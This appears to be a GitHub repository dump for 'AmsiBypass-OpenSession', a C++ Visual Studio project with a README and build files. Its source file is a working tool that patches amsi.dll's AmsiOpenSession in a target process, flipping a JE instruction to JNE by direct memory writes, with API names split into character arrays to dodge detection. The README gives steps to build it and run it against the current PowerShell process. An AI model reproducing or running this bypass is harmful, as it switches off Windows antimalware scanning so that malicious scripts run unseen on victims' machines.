├── AmsiBypass-OpenSession
    ├── AmsiOpenSession.user
    ├── AmsiOpenSession.vcxproj.user
    ├── AmsiOpenSession.filters
    ├── AmsiOpenSession.sln
    ├── AmsiOpenSession.cpp
    └── AmsiOpenSession.vcxproj
└── README.md


/AmsiBypass-OpenSession/AmsiOpenSession.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/AmsiBypass-OpenSession/AmsiOpenSession.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # AmsiBypass-OpenSession
 2 | This code bypass AMSI by setting JE instruction to JNE in assembly of amsi.dll file
 3 | 
 4 | # Credits :
 5 | The original code and idea is from  :  https://github.com/TheD1rkMtr/AMSI_patch
 6 | 
 7 | # steps to Run :
 8 | 
 9 | 1. You can either download the prebuild exe of file from release , or can compile your own with help of solution file
10 | 2. after having AmsiOpenSession.exe , run it in powershell with pid of the process , where AMSI will be triggered 
11 | 3. we will be setting pid of current process only so , we will run `AmsiOpenSession.exe $pid` 
12 | 
13 | 
14 | 
15 | 


--------------------------------------------------------------------------------
/AmsiBypass-OpenSession/AmsiOpenSession.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="AmsiOpenSession.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/AmsiBypass-OpenSession/AmsiOpenSession.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.32106.194
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiOpenSession", "AmsiOpenSession.vcxproj", "{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Debug|x64.Build.0 = Debug|x64
18 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Debug|x86.Build.0 = Debug|Win32
20 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Release|x64.ActiveCfg = Release|x64
21 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Release|x64.Build.0 = Release|x64
22 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Release|x86.ActiveCfg = Release|Win32
23 | 		{E09F4899-D8B3-4282-9E3A-B20EE9A3D463}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {7BF3C216-5D9B-4C44-B4C7-53451AF96E24}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/AmsiBypass-OpenSession/AmsiOpenSession.cpp:
--------------------------------------------------------------------------------
 1 | #include <Windows.h>
 2 | #include <stdio.h>
 3 | #pragma comment(lib, "ntdll")
 4 | 
 5 | #ifndef NT_SUCCESS
 6 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
 7 | #endif
 8 | 
 9 | char ams1[] = { 'a','m','s','i','.','d','l','l',0 };
10 | char ams10p3n[] = { 'A','m','s','i','O','p','e','n','S','e','s','s','i','o','n',0 };
11 | 
12 | EXTERN_C NTSTATUS NTAPI NtProtectVirtualMemory(
13 |     IN HANDLE ProcessHandle,
14 |     IN OUT PVOID* BaseAddress,
15 |     IN OUT PSIZE_T RegionSize,
16 |     IN ULONG NewProtect,
17 |     OUT PULONG OldProtect
18 | );
19 | 
20 | EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(
21 |     IN HANDLE ProcessHandle,
22 |     IN PVOID BaseAddress,
23 |     IN PVOID Buffer,
24 |     IN SIZE_T NumberOfBytesToWrite,
25 |     OUT PSIZE_T NumberOfBytesWritten OPTIONAL
26 | );
27 | 
28 | DWORD64 GetAddr(LPVOID addr) {
29 |     for (int i = 0; i < 1024; i++) {
30 |         if (*((PBYTE)addr + i) == 0x74) return (DWORD64)addr + i;
31 |     }
32 | }
33 | 
34 | void AMS1patch1(HANDLE hProc) {
35 |     void* ptr = GetProcAddress(LoadLibraryA(ams1), ams10p3n);
36 | 
37 |     char Patch[1];
38 |     Patch[0] = 0x75;
39 | 
40 |     DWORD OldProtect = 0;
41 |     SIZE_T memPage = 0x1000;
42 |     void* ptraddr2 = (void*)GetAddr(ptr);
43 |     //printf("\n[+] The Patch : %p\n\n", *(INT_PTR*)Patch);
44 | 
45 |     NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(hProc, &ptraddr2, &memPage, PAGE_EXECUTE_READWRITE, &OldProtect);
46 |     if (!NT_SUCCESS(NtProtectStatus1)) {
47 |         printf("[!] Failed in NtProtectVirtualMemory1 (%u)\n", GetLastError());
48 |         return;
49 |     }
50 | 
51 |     NTSTATUS NtWriteStatus = NtWriteVirtualMemory(hProc, (void*)GetAddr(ptr), Patch, 1, nullptr);
52 |     if (!NT_SUCCESS(NtWriteStatus)) {
53 |         printf("[!] Failed in NtWriteVirtualMemory (%u)\n", GetLastError());
54 |         return;
55 |     }
56 | 
57 |     NTSTATUS NtProtectStatus2 = NtProtectVirtualMemory(hProc, &ptraddr2, &memPage, OldProtect, &OldProtect);
58 |     if (!NT_SUCCESS(NtProtectStatus2)) {
59 |         printf("[!] Failed in NtProtectVirtualMemory2 (%u)\n", GetLastError());
60 |         return;
61 |     }
62 | 
63 |     printf("\n[+] AMSI patched !!\n\n");
64 | }
65 | 
66 | int main(int argc, char** argv) {
67 |     HANDLE hProc;
68 | 
69 |     if (argc != 2) {
70 |         printf("USAGE: AMS1-Patch.exe <PID>\n");
71 |         return 1;
72 |     }
73 | 
74 |     hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)atoi(argv[1]));
75 |     if (!hProc) {
76 |         printf("Failed in OpenProcess (%u)\n", GetLastError());
77 |         return 2;
78 |     }
79 | 
80 |     AMS1patch1(hProc);
81 | 
82 |     CloseHandle(hProc);
83 | 
84 |     return 0;
85 | }
86 | 


--------------------------------------------------------------------------------
/AmsiBypass-OpenSession/AmsiOpenSession.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{e09f4899-d8b3-4282-9e3a-b20ee9a3d463}</ProjectGuid>
 25 |     <RootNamespace>AmsiOpenSession</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="AmsiOpenSession.cpp" />
143 |   </ItemGroup>
144 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
145 |   <ImportGroup Label="ExtensionTargets">
146 |   </ImportGroup>
147 | </Project>


--------------------------------------------------------------------------------